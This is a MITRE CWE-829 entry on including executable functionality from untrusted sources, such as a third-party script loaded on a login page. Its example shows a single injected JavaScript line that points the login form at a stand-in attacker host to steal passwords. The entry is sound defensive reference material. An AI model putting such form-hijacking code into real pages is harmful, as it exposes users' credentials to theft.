CWE-829: Inclusion of Functionality from Untrusted Control Sphere

Description

The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

Submission Date :

Nov. 29, 2010, midnight

Modification Date :

2023-06-29 00:00:00+00:00

Organization :

MITRE
Extended Description

When including third-party functionality, such as a web widget, library, or other source of functionality, the product must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.

This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user's cookies, or open redirect to malware (CWE-601).

Example Vulnerable Codes

Example - 1

This login webpage includes a weather widget from an external website:


<form id ="loginForm" name="loginForm" action="login.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form>
<script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script><div id="loginBox">Please Login:</div><div id="WeatherWidget"></div><div class="header"> Welcome!</div>

This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).

For example, user login information could easily be stolen with a single line added to weatherwidget.js:


// ...Weather widget code....// 
document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";

This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site.

Related Weaknesses

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined to give an overview of the different insight to similar items that may exist at higher and lower levels of abstraction.

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
Go to
CWE-669: Incorrect Resource Transfer Between Spheres
Go to
CWE-827: Improper Control of Document Type Definition
Go to
CWE-830: Inclusion of Web Functionality from an Untrusted Source
Go to

Visit http://cwe.mitre.org/ for more details.